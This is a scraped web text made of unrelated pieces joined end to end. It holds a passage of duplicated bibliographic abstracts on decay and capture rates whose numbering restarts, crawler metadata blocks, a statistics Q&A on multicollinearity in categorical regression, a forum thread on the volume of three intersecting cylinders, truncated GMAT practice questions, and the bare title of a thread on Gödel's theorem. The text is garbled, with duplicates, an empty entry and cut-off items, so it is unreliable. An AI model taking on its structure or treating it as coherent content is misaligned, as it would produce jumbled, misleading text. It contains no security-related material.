temperature and oxygen deprivation, were then investigated. C. reinhardtii was found to present a higher BDR in the dark than A. platensis, illustrating here the difference between eukaryotic and prokaryotic cells. In both cases, temperature proved an influential parameter, and the Arrhenius law was found to efficiently relate specific BDR to culture temperature. The utility of decreasing temperature at night to increase biomass productivity in a solar photobioreactor is also illustrated. 6. Theory of weak hypernuclear decay SciTech Connect Dubach, J.F.; Feldman, G.B.; Holstein, B.R. |; de la Torre, L. 1996-07-01 The weak nomesonic decay of {Lambda}-hypernuclei is studied in the context of a one-meson-exchange model. Predictions are made for the decay rate, the {ital p}/{ital n} stimulation ratio and the asymmetry in polarized hypernuclear decay. Copyright {copyright} 1996 Academic Press, Inc. 7. Improving dengue virus capture rates in humans and vectors in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance strategy. PubMed Thomas, Stephen J; Aldstadt, Jared; Jarman, Richard G; Buddhari, Darunee; Yoon, In-Kyu; Richardson, Jason H; Ponlawat, Alongkot; Iamsirithaworn, Sopon; Scott, Thomas W; Rothman, Alan L; Gibbons, Robert V; Lambrechts, Louis; Endy, Timothy P 2015-07-01 Dengue is of public health importance in tropical and sub-tropical regions. 
Dengue virus (DENV) transmission dynamics was studied in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance of 93 hospitalized subjects with confirmed dengue (initiates) and associated cluster individuals (associates) with entomologic sampling. A total of 438 associates were enrolled from 208 houses with household members with a history of fever, located within a 200-m radius of an initiate case. Of 409 associates, 86 (21%) had laboratory-confirmed DENV infection. A total of 63 (1.8%) of the 3,565 mosquitoes collected were dengue polymerase chain reaction positive (PCR+). There was a significant relationship between spatial proximity to the initiate case and likelihood of detecting DENV from associate cases and Aedes mosquitoes. The viral detection rate from human hosts and mosquito vectors in this study was higher than previously observed by the study team in the same geographic area using different methodologies. We propose that the sampling strategy used in this study could support surveillance of DENV transmission and vector interactions. © The American Society of Tropical Medicine and Hygiene. 8. Improving Dengue Virus Capture Rates in Humans and Vectors in Kamphaeng Phet Province, Thailand, Using an Enhanced Spatiotemporal Surveillance Strategy PubMed Central Thomas, Stephen J.; Aldstadt, Jared; Jarman, Richard G.; Buddhari, Darunee; Yoon, In-Kyu; Richardson, Jason H.; Ponlawat, Alongkot; Iamsirithaworn, Sopon; Scott, Thomas W.; Rothman, Alan L.; Gibbons, Robert V.; Lambrechts, Louis; Endy, Timothy P. 2015-01-01 Dengue is of public health importance in tropical and sub-tropical regions. Dengue virus (DENV) transmission dynamics was studied in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance of 93 hospitalized subjects with confirmed dengue (initiates) and associated cluster individuals (associates) with entomologic sampling. A total of 438 associates were enrolled from 208 houses with household members with a history of fever, located within a 200-m radius of an initiate case. Of 409 associates, 86 (21%) had laboratory-confirmed DENV infection. A total of 63 (1.8%) of the 3,565 mosquitoes collected were dengue polymerase chain reaction positive (PCR+). There was a significant relationship between spatial proximity to the initiate case and likelihood of detecting DENV from associate cases and Aedes mosquitoes. The viral detection rate from human hosts and mosquito vectors in this study was higher than previously observed by the study team in the same geographic area using different methodologies. We propose that the sampling strategy used in this study could support surveillance of DENV transmission and vector interactions. PMID:25986580 9. On collisional capture rates of irregular satellites around the gas-giant planets and the minimum mass of the solar nebula Koch, F. Elliott; Hansen, Bradley M. S. 2011-09-01 We investigate the probability that an inelastic collision of planetesimals within the Hill sphere of the Jovian planets could explain the presence and orbits of observed irregular satellites. Capture of satellites via this mechanism is highly dependent on not only the mass of the protoplanetary disc, but also the shape of the planetesimal size distribution. We performed 2000 simulations for integrated time intervals ˜2 Myr and found that, given the currently accepted value for the minimum mass solar nebula and planetesimal number density based upon the Nesvorný et al. 
and Charnoz & Morbidelli size distribution dN ∼ D^(-3.5) dD, the collision rates for the different Jovian planets range between ∼0.6 and ≳170 Myr⁻¹ for objects with radii 1 km ≤ r ≤ 10 km. Additionally, we found that the probability that these collisions remove enough orbital energy to yield a bound orbit was ≲10⁻⁵ and had very little dependence on the relative size of the planetesimals. Of these collisions, the collision energy between two objects was ≳10³ times the gravitational binding energy for objects with radii ∼100 km. We find that capturing irregular satellites via collisions between unbound objects can only account for ∼0.1 per cent of the observed population, hence this cannot be the sole method of producing irregular satellites. 10. Hypernuclear Weak Decays Itonaga, K.; Motoba, T. The recent theoretical studies of Λ-hypernuclear weak decays of the nonmesonic and π-mesonic ones are developed with the aim to disclose the link between the experimental decay observables and the underlying basic weak decay interactions and the weak decay mechanisms. The expressions of the nonmesonic decay rates Γnm and the decay asymmetry parameter α₁ of protons from the polarized hypernuclei are presented in the shell model framework. We then introduce the meson theoretical ΛN → NN interactions which include the one-meson exchanges, the correlated-2π exchanges, and the chiral-pair-meson exchanges. The features of meson exchange potentials and their roles on the nonmesonic decays are discussed. With the adoption of the π + 2π/ρ + 2π/σ + ω + K + ρπ/a₁ + σπ/a₁ exchange potentials, we have carried out the systematic calculations of the nonmesonic decay observables for light-to-heavy hypernuclei. The present model can account for the available experimental data of the decay rates, Γn/Γp ratios, and the intrinsic asymmetry parameters αΛ (αΛ is related to α₁) of emitted protons well and consistently within the error bars. The hypernuclear lifetimes are evaluated by converting the total weak decay rates Γtot = Γπ + Γnm to τ, which exhibit a saturation property for hypernuclear mass A ≥ 30 and agree grossly well with experimental data for the mass range from light to heavy hypernuclei except for the very light ones. Future extensions of the model and the remaining problems are also mentioned. The π-mesonic weak processes are briefly surveyed, and the calculations and predictions are compared and confirmed by the recent high-precision FINUDA π-mesonic decay data. This shows that the theoretical basis seems to be firmly grounded. 11. Isovolumic pressure-to-early rapid filling decay rate relation: model-based derivation and validation via simultaneous catheterization echocardiography. PubMed Chung, Charles S; Ajo, David M; Kovács, Sándor J 2006-02-01 Transmitral Doppler echocardiography is the preferred method of noninvasive diastolic function assessment. Correlations between catheterization-based measures of isovolumic relaxation (IVR) and transmitral, early rapid filling (Doppler E-wave)-derived parameters have been observed, but no model-based, causal explanation has been offered.
IVR has also been characterized in terms of its duration as the IVR time (IVRT) and by τ, the time constant of IVR, obtained by approximating the terminal left ventricular IVR pressure contour as P(t) = P∞ + P₀e^(-t/τ), where P(t) is the pressure, P∞ and P₀ are constants, t is time, and τ is the time constant of IVR. To characterize the relation between IVR and early rapid filling more fully, simultaneous (micromanometric) left ventricular pressure and transmitral Doppler E-wave data from 25 subjects undergoing elective cardiac catheterization and having normal physiology were analyzed. The time constant τ was determined from the dP/dt vs. P (phase) plane, and simultaneous Doppler E-waves provided global indexes of chamber viscosity/relaxation (c), chamber stiffness (k), and load (x₀). We hypothesize that temporal continuity of pressure decay at mitral valve opening and physiological constraints permit the algebraic derivation of linear relations relating 1/τ to both the peak atrioventricular pressure gradient (kx₀) and E-wave-derived viscosity/relaxation (c), but do not support a similar, causal (linear) relation between deceleration time and τ or IVRT. Both predicted linear relations were observed: kx₀ to 1/τ (r = 0.71) and viscosity/relaxation to 1/τ (r = 0.71). Similarly, as anticipated, only a weak linear correlation between deceleration time and IVRT or τ was observed (r = 0.41). The observed in vivo relationship provides insight into the isovolumic mechanism of relaxation and the changing-volume mechanism of early rapid filling via a link of the respective relaxation properties. 12. Photonuclear and radiative-capture reaction rates for nuclear astrophysics and transmutation: ⁹²⁻¹⁰⁰Mo, ⁸⁸Sr, ⁹⁰Zr, and ¹³⁹La Beard, M.; Frauendorf, S.; Kämpfer, B.; Schwengner, R.; Wiescher, M. 2012-06-01 Experimental photoabsorption cross sections for the nuclei ⁹²,⁹⁴,⁹⁶,⁹⁸,¹⁰⁰Mo, ⁸⁸Sr, ⁹⁰Zr, and ¹³⁹La are used as an input for calculations of (γ,n), (γ,p), and (γ,α), as well as (n,γ), (p,γ), and (α,γ) cross sections and reaction rates at energies and temperatures relevant for nucleosynthesis network models and transmutation projects. The calculations are performed with the statistical-model code TALYS. The results are compared with those obtained by using different analytic standard parametrizations of γ-ray strength functions implemented in TALYS and with an energy-damped double-Lorentzian model. The radiative capture reaction cross sections are enhanced by the pygmy resonances in ⁸⁸Sr, ⁹⁰Zr, and ¹³⁹La. 13. Modification of the ³H-leucine Incorporation Technique for Quantifying Rates of Bacterial Secondary Production on Decaying Wetland Plant Litter: Effectiveness of Microdialysis. Gillies, J. E.; Francoeur, S. N.; Kuehn, K. A. 2005-05-01 The radiolabelled ³H-leucine incorporation technique for quantifying rates of bacterial production has increased in popularity since its original description for bacterioplankton communities. Prior studies addressing incorporation conditions (e.g., substrate saturation) for bacterial communities in other habitats, such as decaying plant litter, have reported a wide range of final leucine concentrations (400 nM to 50,000 nM) to achieve saturation-level uptake. We assessed the application of the ³H-leucine incorporation procedure for measuring bacterial production on decaying wetland plant litter.
Substrate saturation experiments (9 concentrations, 10nM to 50,000nM final leucine) were conducted for bacterial communities colonizing submerged litter of three emergent plant species (Typha angustifolia, Schoenoplectus validus, and Phragmites australis). A modified 3H-leucine protocol was developed by coupling previously described incubation and extraction protocols with microdialysis (500MWCO) of the final radiolabelled protein extract. Incorporation of 3H-leucine into protein exhibited a biphasic saturation curve, with lower Km values ranging from 400nM to 1200nM depending on the plant species studied. Upper Km values ranged from 4000nM to 6000nM. Dialysis of the crude protein extract significantly improved counting precision and the signal-to-noise ratio. These results suggest differential uptake by litter associated microbial assemblages, with lower Km values possibly representing bacterial uptake and higher Km values representing non-bacterial uptake. 14. Determination of rate constants and branching ratios for TCE degradation by zero-valent iron using a chain decay multispecies model Hwang, Hyoun-Tae; Jeen, Sung-Wook; Sudicky, Edward A.; Illman, Walter A. 2015-06-01 The applicability of a newly-developed chain-decay multispecies model (CMM) was validated by obtaining kinetic rate constants and branching ratios along the reaction pathways of trichloroethene (TCE) reduction by zero-valent iron (ZVI) from column experiments. Changes in rate constants and branching ratios for individual reactions for degradation products over time for two columns under different geochemical conditions were examined to provide ranges of those parameters expected over the long-term. As compared to the column receiving deionized water, the column receiving dissolved CaCO3 showed higher mean degradation rates for TCE and all of its degradation products. However, the column experienced faster reactivity loss toward TCE degradation due to precipitation of secondary carbonate minerals, as indicated by a higher value for the ratio of maximum to minimum TCE degradation rate observed over time. From the calculated branching ratios, it was found that TCE and cis-dichloroethene (cis-DCE) were dominantly dechlorinated to chloroacetylene and acetylene, respectively, through reductive elimination for both columns. The CMM model, validated by the column test data in this study, provides a convenient tool to determine simultaneously the critical design parameters for permeable reactive barriers and natural attenuation such as rate constants and branching ratios. 15. Determination of rate constants and branching ratios for TCE degradation by zero-valent iron using a chain decay multispecies model. PubMed Hwang, Hyoun-Tae; Jeen, Sung-Wook; Sudicky, Edward A; Illman, Walter A 2015-01-01 The applicability of a newly-developed chain-decay multispecies model (CMM) was validated by obtaining kinetic rate constants and branching ratios along the reaction pathways of trichloroethene (TCE) reduction by zero-valent iron (ZVI) from column experiments. Changes in rate constants and branching ratios for individual reactions for degradation products over time for two columns under different geochemical conditions were examined to provide ranges of those parameters expected over the long-term. As compared to the column receiving deionized water, the column receiving dissolved CaCO3 showed higher mean degradation rates for TCE and all of its degradation products. 
However, the column experienced faster reactivity loss toward TCE degradation due to precipitation of secondary carbonate minerals, as indicated by a higher value for the ratio of maximum to minimum TCE degradation rate observed over time. From the calculated branching ratios, it was found that TCE and cis-dichloroethene (cis-DCE) were dominantly dechlorinated to chloroacetylene and acetylene, respectively, through reductive elimination for both columns. The CMM model, validated by the column test data in this study, provides a convenient tool to determine simultaneously the critical design parameters for permeable reactive barriers and natural attenuation such as rate constants and branching ratios. 16. Measurement of muon capture on the proton to 1% precision and determination of the pseudoscalar coupling gP. PubMed Andreev, V A; Banks, T I; Carey, R M; Case, T A; Clayton, S M; Crowe, K M; Deutsch, J; Egger, J; Freedman, S J; Ganzha, V A; Gorringe, T; Gray, F E; Hertzog, D W; Hildebrandt, M; Kammel, P; Kiburg, B; Knaack, S; Kravtsov, P A; Krivshich, A G; Lauss, B; Lynch, K R; Maev, E M; Maev, O E; Mulhauser, F; Petitjean, C; Petrov, G E; Prieels, R; Schapkin, G N; Semenchuk, G G; Soroka, M A; Tishchenko, V; Vasilyev, A A; Vorobyov, A A; Vznuzdaev, M E; Winter, P 2013-01-04 The MuCap experiment at the Paul Scherrer Institute has measured the rate ΛS of muon capture from the singlet state of the muonic hydrogen atom to a precision of 1%. A muon beam was stopped in a time projection chamber filled with 10-bar, ultrapure hydrogen gas. Cylindrical wire chambers and a segmented scintillator barrel detected electrons from muon decay. ΛS is determined from the difference between the μ⁻ disappearance rate in hydrogen and the free muon decay rate. The result is based on the analysis of 1.2 × 10¹⁰ μ⁻ decays, from which we extract the capture rate ΛS = (714.9 ± 5.4(stat) ± 5.1(syst)) s⁻¹ and derive the proton's pseudoscalar coupling gP(q₀² = -0.88 mμ²) = 8.06 ± 0.55. 17. PubMed Groch, M W 1998-01-01 18. EFFECT OF VENTILATION SYSTEMS AND AIR FILTERS ON DECAY RATES OF PARTICLES PRODUCED BY INDOOR SOURCES IN AN OCCUPIED TOWNHOUSE EPA Science Inventory Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we me... 19. EFFECT OF VENTILATION SYSTEMS AND AIR FILTERS ON DECAY RATES OF PARTICLES PRODUCED BY INDOOR SOURCES IN AN OCCUPIED TOWNHOUSE EPA Science Inventory Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we me... 20. Effect of ventilation systems and air filters on decay rates of particles produced by indoor sources in an occupied townhouse Howard-Reed, Cynthia; Wallace, Lance A.; Emmerich, Steven J. Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we measured the deposition of particles ranging from 0.3 to 10 μm in an occupied townhouse and also in an unoccupied test house.
Experiments were run with three different sources (cooking with a gas stove, citronella candle, pouring kitty litter), with the central heating and air conditioning (HAC) fan on or off, and with two different types of in-duct filters (electrostatic precipitator and ordinary furnace filter). Particle size, HAC fan operation, and the electrostatic precipitator had significant effects on particle loss rates. The standard furnace filter had no effect. Surprisingly, the type of source (combustion vs. mechanical generation) and the type of furnishings (fully furnished including carpet vs. largely unfurnished including mostly bare floor) also had no measurable effect on the deposition rates of particles of comparable size. With the HAC fan off, average deposition rates varied from 0.3 h -1 for the smallest particle range (0.3-0.5 μm) to 5.2 h -1 for particles greater than 10 μm. Operation of the central HAC fan approximately doubled these rates for particles <5 μm, and increased rates by 2 h -1 for the larger particles. An in-duct electrostatic precipitator increased the loss rates compared to the fan-off condition by factors of 5-10 for particles <2.5 μm, and by a factor of 3 for 2.5-5.0 μm particles. In practical terms, use of the central fan alone could reduce indoor particle concentrations by 25-50%, and use of an in-duct ESP could reduce particle concentrations by 55-85% compared to fan-off conditions. 1. Radiative decay rate of a quantum well exciton in a semiconductor microcavity: Cross-over behavior of exciton- and cavity-modes Odani, Kensuke; Ohfuti, Yasushi; Cho, Kikuo 1993-08-01 A cross-over behavior was found between microcavity (MC) mode and quantum well (QW)-exciton mode as a function of parallel wave vector k for a QW in a MC, i.e., a 2D structure consisting of two sets of distributed Bragg reflectors (DBR) with a QW at the center of them. The radiative widths of the two modes were calculated as functions of k, the layer number of DBR, and the non-radiative width of the QW-exciton. The radiative decay rate of the QW-exciton mode shows a remarkable enhancement at a critical value of k, which is determined by the relative frequencies of the "empty" MC and "bare" QW-exciton modes. The cross-over behavior is the result of the excessive mixing of the two modes. 2. Rapid heating tensile tests of high-energy-rate-forged 316L stainless steel containing internal helium from radioactive decay of absorbed tritium SciTech Connect Mosley, W.C. 1990-12-31 316L stainless steel is a candidate material for construction of equipment that will be exposed to tritium. This austenitic stainless steel is frequently used in the high-energy-rate-forged (HERF) metallurgical condition to take advantage of increased strength produced by cold work introduced by this process. Proper design of tritium-handling equipment will require an understanding of how helium-3, the product of radioactive decay of tritium, affects mechanical properties. This report describes results of elevated-temperature tensile testing of HERF 316L stainless steel specimens containing helium concentrations of 171 (calculated) atomic parts per million (appm). Results are compared with those reported previously for specimens containing 0 and 94 (measured) appm helium. 3. Rapid heating tensile tests of high-energy-rate-forged 316L stainless steel containing internal helium from radioactive decay of absorbed tritium SciTech Connect Mosley, W.C. 
1990-01-01 316L stainless steel is a candidate material for construction of equipment that will be exposed to tritium. This austenitic stainless steel is frequently used in the high-energy-rate-forged (HERF) metallurgical condition to take advantage of increased strength produced by cold work introduced by this process. Proper design of tritium-handling equipment will
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8968431949615479, "perplexity": 6322.303860584943}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934806832.87/warc/CC-MAIN-20171123123458-20171123143458-00400.warc.gz"}
http://stats.stackexchange.com/questions/35233/how-to-test-for-and-remedy-multicollinearity-in-optimal-scaling-ordinal-regressi
# How to test for and remedy multicollinearity in optimal scaling/ordinal regression with categorical IVs

I have a data set containing only categorical variables (both nominal and ordinal in nature). The dependent variable is also ordinal (with 4 categories). I was planning to run a categorical regression with optimal scaling instead of ordinal logistic regression, aiming to obtain a single beta coefficient for each independent variable (and also to account for non-linearity), because an overall comment is desired on whether the dependent variable is affected by each independent variable. Now, a few of the variables seem, on theoretical grounds, to be related to each other. So I want to check whether multicollinearity exists, and to remove it to facilitate the regression. But I don't want to drop any variable, because I have quite a few. The polychoric correlation matrix shows the highest pairwise correlation to be 0.69; apart from this pair and one other, all pairwise correlations are quite small. As the variables are not continuous in my case, how do I test for the presence of multicollinearity in categorical regression, and what is the remedy? How do I remove the effect of multicollinearity? I guess standardization will not help, as these variables are categorical.

I changed your title quite a bit, I hope it clarifies rather than obscures your intent. – Peter Flom Aug 28 '12 at 11:03

That's okay, the title is certainly more general now, and I think whatever the regression type (CATREG or ordinal logistic regression), the test for and remedy of multicollinearity should be the same. Am I right? – Blain Waan Aug 28 '12 at 19:05

If you are using R, SPSS or Stata, you can look at the perturb package. It diagnoses collinearity by adding random noise to continuous variables; for categorical variables, some observations are changed to different categories. The documentation for perturb in R notes that the model need not be lm, implying that any model (including ones built with optimal scaling or ordinal logistic regression) could be used.
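The answer above names the perturb package but gives no code. What follows is not that package: it is a minimal Python sketch of the same perturbation idea for purely categorical predictors, under assumptions of mine (a dummy-coded ordinary least-squares fit as a stand-in for CATREG or ordinal logistic regression, placeholder column names, a 5% reclassification share). Coefficients whose estimates swing widely across perturbed refits point to the variables involved in near-collinearity; the 0.69 polychoric pair would be the first place to look.

```python
import numpy as np
import pandas as pd

def perturb_categories(s: pd.Series, share: float, rng) -> pd.Series:
    """Randomly reassign a share of the values to other observed categories."""
    out = s.copy()
    idx = rng.choice(len(s), size=int(share * len(s)), replace=False)
    out.iloc[idx] = rng.choice(s.unique(), size=len(idx))
    return out

def coefficient_spread(df, predictors, outcome, n_iter=100, share=0.05, seed=0):
    """Refit a dummy-coded least-squares model on repeatedly perturbed data
    and return the standard deviation of each coefficient across refits."""
    rng = np.random.default_rng(seed)
    y = df[outcome].to_numpy(dtype=float)  # ordinal outcome coded e.g. 1..4
    draws = []
    for _ in range(n_iter):
        perturbed = pd.DataFrame(
            {p: perturb_categories(df[p], share, rng) for p in predictors}
        )
        X = pd.get_dummies(perturbed, drop_first=True).astype(float)
        X.insert(0, "intercept", 1.0)
        beta, *_ = np.linalg.lstsq(X.to_numpy(), y, rcond=None)
        draws.append(pd.Series(beta, index=X.columns))
    return pd.concat(draws, axis=1).std(axis=1).sort_values(ascending=False)

# Hypothetical usage (column names are placeholders, not from the question):
# spread = coefficient_spread(data, ["edu", "income_band", "region"], "satisfaction")
# print(spread.head())
```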
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7368321418762207, "perplexity": 1180.5237064747528}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1393999678302/warc/CC-MAIN-20140305060758-00089-ip-10-183-142-35.ec2.internal.warc.gz"}
http://mymathforum.com/calculus/342181-calculating-volume-three-intersecting-cylinders.html
My Math Forum: calculating volume of three intersecting cylinders (Calculus)

October 8th, 2017, 01:27 PM #1
Three cylinders of radius 1 intersect at right angles at the origin. Find the volume contained inside all three cylinders. Would anyone show me how to use a double integral to solve this problem, first with Cartesian coordinates and then with polar coordinates? Answer: $\displaystyle 16 - 8 \sqrt{2}$

October 8th, 2017, 03:34 PM #2
I vaguely remember doing this by taking 8 times the volume of the solid within the first octant. All 8 octants are identical. That volume would then seem to be $2-\sqrt{2}$; see if you can work it that way.
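Sketching the Cartesian double integral asked for above: inside the tricylinder {x²+y²≤1, y²+z²≤1, x²+z²≤1}, a point (x, y) of the unit disk admits |z| ≤ min(√(1-x²), √(1-y²)), so V = ∬_{x²+y²≤1} 2·min(√(1-x²), √(1-y²)) dA. By symmetry this is 16 times the integral of √(1-x²) over the slice 0 ≤ y ≤ x of the disk, which works out to 16(1 - √2/2) = 16 - 8√2, one eighth of which is the 2 - √2 mentioned in the reply. The snippet below is my own numerical sanity check of that double integral on a midpoint grid; it is not from the thread.

```python
import numpy as np

# Midpoint-rule check of V = integral over {x²+y²≤1} of 2·min(√(1-x²), √(1-y²)),
# which should approach 16 - 8*sqrt(2) ≈ 4.6863 as the grid is refined.
n = 1000
h = 2.0 / n
x = -1.0 + h * (np.arange(n) + 0.5)            # cell midpoints in [-1, 1]
X, Y = np.meshgrid(x, x, indexing="ij")
inside = X**2 + Y**2 <= 1.0                    # the unit disk x² + y² ≤ 1
height = 2.0 * np.minimum(np.sqrt(1.0 - X**2), np.sqrt(1.0 - Y**2))
volume = np.sum(height[inside]) * h * h
print(volume, 16 - 8 * np.sqrt(2))             # ≈ 4.686 in both cases
```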
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5325036644935608, "perplexity": 2602.952893406332}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267159193.49/warc/CC-MAIN-20180923095108-20180923115508-00365.warc.gz"}
https://www.beatthegmat.com/search.php?author_id=391525&sr=posts&sid=f74cd4086c5a86dd2a1acd219665591a
## Search found 1395 matches

#### A certain movie star's salary for each film she makes consists of a fixed amount, along with a percentage of the gross
A certain movie star's salary for each film she makes consists of a fixed amount, along with a percentage of the gross revenue the film generates. In her last two roles, the star made $32 million on a film that grossed $100 million, and $24 million on a film that grossed $60 mill...

#### What is the ratio of $$x:y:z?$$
What is the ratio of $$x:y:z?$$ (1) $$xy = 14$$ (2) $$yz = 21$$ Source: Official Guide

#### There are 8 teams in a certain league and each team plays each of the other teams exactly once. If each game is played
There are 8 teams in a certain league and each team plays each of the other teams exactly once. If each game is played by 2 teams, what is the total number of games played? A. 15 B. 16 C. 28 D. 56 E. 64 Source: Official Guide

#### Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$
Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$ (1) $$A^{\dfrac13}>B^2$$ (2) $$A>B^2$$ Source: GMAT Paper Tests

#### 10 business executives and 7 chairmen meet at a conference. If each business executive shakes the hand of every other
10 business executives and 7 chairmen meet at a conference. If each business executive shakes the hand of every other business executive and every chairman once, and each chairman shakes the hand of each of the business executives but not the other chairmen, how many handshakes would take place? A. ...

#### What is the average (arithmetic mean) of eleven consecutive integers?
What is the average (arithmetic mean) of eleven consecutive integers? (1) The average of the first nine integers is $$7.$$ (2) The average of the last nine integers is $$9.$$ Source: GMAT Prep

#### If the terms of a sequence are $$t_1, t_2, t_3, \ldots, t_n,$$ what is the value of $$n?$$
If the terms of a sequence are $$t_1, t_2, t_3, \ldots, t_n,$$ what is the value of $$n?$$ (1) The sum of the $$n$$ terms is $$3,124.$$ (2) The average (arithmetic mean) of the $$n$$ terms is $$4.$$ Source: GMAT Prep

#### A bus made a roundtrip journey from Madison towards Chicago, which is 240 km away. In the onward journey, the bus divide
A bus made a roundtrip journey from Madison towards Chicago, which is 240 km away. In the onward journey, the bus divided the journey time into 3 equal blocks. Started at 50 kph, it took stoppages after every block and increased its speed by 10 kph after every stoppage. At Chicago, it took a halt of...

#### If $$r$$ and $$s$$ are positive integers, can the fraction $$\dfrac{r}{s}$$ be expressed as a decimal with only a finite
If $$r$$ and $$s$$ are positive integers, can the fraction $$\dfrac{r}{s}$$ be expressed as a decimal with only a finite number of nonzero digits? (1) $$s$$ is a factor of $$100.$$ (2) $$r$$ is a factor of $$100.$$ Source: Official Guide

#### If $$x < y,$$ which of the following must be true?
If $$x < y,$$ which of the following must be true? (A) $$x < y^2$$ (B) $$x^2 < y$$ (C) $$x^2 < y^2$$ (D) $$(x - y)^2 > 0$$ (E) $$x^3 > y$$ Source: Manhattan GMAT

#### Is it true that $$x > 0?$$
Is it true that $$x > 0?$$ (1) $$x^2 = 2x$$ (2) $$x^3 = 3x$$ Source: GMAT Prep

#### $$x$$ is an integer and $$x$$ raised to any odd integer is greater than zero; is $$w - z$$ greater than $$5$$ times the
$$x$$ is an integer and $$x$$ raised to any odd integer is greater than zero; is $$w - z$$ greater than $$5$$ times the quantity $$7^{x-1}-5^x?$$ (1) $$z < 25$$ and $$w=7^x$$ (2) $$x = 4$$ Source: Official Guide

#### Committee $$X$$ has $$4$$ members, committee $$Y$$ has $$5$$ members, and these committees have no members in common. If
Committee $$X$$ has $$4$$ members, committee $$Y$$ has $$5$$ members, and these committees have no members in common. If a task force is to be formed consisting of one member of $$X$$ and one member of $$Y,$$ how many different task forces are possible? A) 6 B) 9 C) 10 D) 20 E) 36 Answer: D Source: ...

#### In the figure above, if the area of triangular region $$D$$ is $$4,$$ what is the length of a side of square region
In the figure above, if the area of triangular region $$D$$ is $$4,$$ what is the length of a side of square region $$A?$$ (1) The area of square region $$B$$ is $$9.$$ (2) The area of square region $$C$$ is $$\dfrac{64}9.$$

#### A committee is composed of $$w$$ women and $$m$$ men. If $$3$$ women and $$2$$ men are added to the committee, and if on
A committee is composed of $$w$$ women and $$m$$ men. If $$3$$ women and $$2$$ men are added to the committee, and if one person is selected at random from the enlarged committee, then the probability that a woman is selected can be represented by (A) $$\dfrac{w}{m}$$ (B) $$\dfrac{w}{w+m}$$ (C) \(\d...
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4387013912200928, "perplexity": 635.8495049948218}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057416.67/warc/CC-MAIN-20210923013955-20210923043955-00097.warc.gz"}
https://www.physicsforums.com/threads/proof-of-godels-1st-theorem-missing-o-consistency-requirement-whats-wrong.647039/
Proof of Godel's 1st Theorem missing ω-consistency requirement. What's wrong?

1. Oct 25, 2012 andrewkirk

